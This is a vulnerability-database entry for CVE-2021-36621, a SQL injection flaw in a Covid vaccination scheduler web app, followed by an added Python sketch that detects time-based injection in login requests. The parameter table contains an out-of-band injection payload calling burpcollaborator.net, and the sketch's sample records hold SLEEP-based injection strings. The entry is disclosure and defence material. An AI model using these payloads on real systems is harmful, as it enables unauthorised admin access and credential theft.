
CVE-2021-36621

29 Jul 2021 17:11:30 | Reported by mitre | Type: cve | web.nvd.nist.gov

Sourcecodester Online Covid Vaccination Scheduler System 1.0 is vulnerable to SQL injection. The username parameter is vulnerable to time-based SQL injection. After successfully dumping the admin password hash, an attacker can decrypt it and obtain the plain-text password. The attacker could then authenticate as Administrator.

| Parameter | Position | Path | Description | CWE |
|---|---|---|---|---|
| username | request body | scheduler/classes/Login.php?f=login | SQL injection vulnerability in username parameter during login (time-based blind). | CWE-89 |
| password | request body | scheduler/classes/Login.php?f=login | SQL injection vulnerability in username parameter during login (time-based blind). | CWE-89 |
| lid | query param | scheduler/addSchedule.php?lid=(select%20load_file('\\\\burpcollaborator.net\\gfd')) | SQL injection vulnerability via lid parameter in addSchedule form (remote file read). | CWE-89 |
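
An added detection sketch, not part of the original entry or the application's own code: it scans request records for the login endpoint and parameters listed above, flagging delay-function calls in the request body and slow responses. The record layout, the delay-function patterns and the thresholds are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

LOGIN_PATH = "scheduler/classes/Login.php"   # path from the table above
WATCHED = ("username", "password")           # parameters from the table above
# Assumptions: MySQL-style delay calls, and thresholds chosen for illustration.
DELAY_RE = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)
SLOW_SECONDS, MIN_HITS = 3.0, 2

def is_login(url):
    parts = urlsplit(url)
    return parts.path.endswith(LOGIN_PATH) and parse_qs(parts.query).get("f") == ["login"]

def reasons(rec):
    """Reasons one request record looks like time-based injection probing."""
    if rec["method"] != "POST" or not is_login(rec["url"]):
        return []
    found = []
    form = parse_qs(rec["body"], keep_blank_values=True)  # also URL-decodes values
    for name in WATCHED:
        if any(DELAY_RE.search(v) for v in form.get(name, [])):
            found.append(f"delay call in {name}")
    if rec["seconds"] >= SLOW_SECONDS:
        found.append("slow response")
    return found

def suspicious_clients(records):
    """Clients with at least MIN_HITS login requests that carry a delay call."""
    hits = Counter()
    for rec in records:
        if any(r.startswith("delay call") for r in reasons(rec)):
            hits[rec["ip"]] += 1
    return sorted(ip for ip, n in hits.items() if n >= MIN_HITS)

# Constructed sample records (not real traffic); the IPs are documentation ranges.
URL = "/scheduler/classes/Login.php?f=login"
SAMPLE = [
    {"ip": "198.51.100.7", "method": "POST", "url": URL, "seconds": 0.04,
     "body": "username=admin&password=secret"},
    {"ip": "203.0.113.9", "method": "POST", "url": URL, "seconds": 5.03,
     "body": "username=admin%27+AND+SLEEP%285%29--+-&password=x"},
    {"ip": "203.0.113.9", "method": "POST", "url": URL, "seconds": 0.05,
     "body": "username=x%27+OR+sleep%283%29--+-&password=x"},
    {"ip": "198.51.100.7", "method": "POST", "url": URL, "seconds": 4.2,
     "body": "username=bob&password=pw"},
]

print(suspicious_clients(SAMPLE))
```

A slow response on its own is only a weak signal, which is why `suspicious_clients` counts requests that carry a delay call rather than slow ones.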


17 Jun 2026 03:58 (Current)
Vulners AI Score: 8.4 (High risk)
CVSS 2: 6.8
CVSS 3.1: 8.1
EPSS: 0.02073